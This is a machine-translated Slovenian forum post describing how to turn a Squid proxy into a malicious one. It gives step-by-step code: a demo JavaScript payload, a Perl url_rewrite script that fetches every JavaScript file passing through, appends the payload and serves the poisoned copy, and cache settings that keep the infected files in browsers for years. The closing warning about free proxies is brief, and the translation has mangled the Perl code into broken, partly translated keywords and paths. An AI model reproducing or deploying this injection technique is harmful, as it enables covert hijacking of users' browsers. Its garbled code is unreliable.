To objavo je nazadnje uredil Mo Xiaowen 7. 6. 2015 ob 23:19
To je mogoče doseči preprosto z modifikacijo konfiguracije SQUID
Kaj je SQUID?
Squid je programska oprema, ki predpomni internetne podatke, sprejema zahteve za prenos uporabnikov in samodejno obdeluje prenesene podatke. Ko uporabnik želi prenesti domačo stran, lahko pošlje zahtevo Lignju, ga prosi, naj jo prenese v njegovem imenu, nato se Lignj poveže s spletno stranjo in zahteva domačo stran, nato pa pošlje domačo stran uporabniku, medtem ko ohranja varnostno kopijo; ko drugi uporabniki zaprosijo za isto stran, Lignj takoj pošlje shranjeno varnostno kopijo uporabniku, tako da uporabnik začuti, da je hitrost precej visoka. Squid lahko posreduje protokole, kot so HTTP, FTP, GOPHER, SSL in WAIS, Squid pa to lahko upravlja samodejno, vi pa lahko nastavite Squid glede na svoje potrebe, da filtrirate nezaželene stvari.
Squid lahko deluje v številnih operacijskih sistemih, kot so AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2 itd.
Izvedba je zelo preprosta:
1. Namestite Squid na en Linux strežnik.
2. Spremeniti kodo strežnika, vstaviti del naše kode v vse prenesene javascrip datoteke in jih poslati naprej.
3. Nastavite čas predpomnilnika naše spremenjene js datoteke čim višje.
Ta metoda velja tudi za spletne strani z omogočenim SSL; če spletna stran naloži nevaren vir (na primer jquery za HTTP stran), večina brskalnikov da opozorilo, vendar malo ljudi posveča pozornost.
Chema je povedal, da je več kot 5.000 ljudi nekaj dni po objavi uporabilo njegov proxy, večina pa ga je uporabila za slabe stvari, ker so ga uporabljali, zato so mislili, da je anonimen in varen, a nikoli niso pričakovali, da bo proxy strežnik počel tudi slabe stvari.
Ustvarite svoj zlonamerni proxy strežnik
Če že imate Squid proxy strežnik, boste potrebovali tudi spletni strežnik, kot je Apache.
Korak 1: Ustvarjanje uporabne vsebine
Uporabljam preprost skript kot demonstracijo, da usmerim vse hiperpovezave na mojo spletno stran.
/etc/squid/payload.js
[mw_shl_code=javascrip remove t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Korak 2: Napišite skripto, ki okuži vse JS datoteke
/etc/squid/poison.pl
[mw_shl_code=perl, res]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
medtem ko(<>)
{
grizl $_;
if($_ =- /(.*.js)/i)
{
$url = $;
system ("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js,"$url");
system("chmod o+r /var/www/tmp/$pid-$count.js");
sistem ("mačka /itd/lignj/payload.js >> /var/www/tmp/$pid-$count.js");
natisni "http://127.0.0.1:80/tmp/$pid-$count.js";
}
else
{
natisni "$_";
}
$count++;
}[/mw_shl_code]
Ta skripta uporablja wget za pridobitev izvirnega javascrip strani in odstranitev t datoteke, nato doda kodo v /etc/squid/payload.js in pošlje spremenjeno datoteko odjemalcu, medtem ko morate ustvariti mapo /var/www/tmp in dovoliti squidu, da vanjo piše datoteke. Ta mapa shranjuje spremenjene js datoteke.
Korak 3: Združite zgornji skript s Squid
Dodaj ga v /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Korak 4: Naj predpomnilnik nikoli ne odpove
/var/www/tmp/.htaccess
[mw_shl_code=html,true] Poteče. Aktivno
ExpiresDefault "dostop plus 3000 dni"[/mw_shl_code]
To bo Apacheju sporočilo, naj mu da dolgo obdobje trajanja, dokler uporabnik ne očisti svojega predpomnilnika.
Če povežete ta proxy, vas bo klik na katerokoli povezavo preusmeril na mojo spletno stran, predpomnilnik pa bo še vedno obstajal, tudi če proxy kasneje ne boste uporabili. Uporabil sem neagresiven payload, in s to metodo lahko hekerji naredijo veliko več. Zato si in prijateljem opomnite, da ste previdni pri uporabi brezplačnih proxyjev.
|
Objavljeno na 19. 01. 2015 02:34:56
|
|
|
|
Objavljeno na 19. 01. 2015 08:48:45
|
Najemodajalec|
Objavljeno na 20. 01. 2015 14:36:06
|
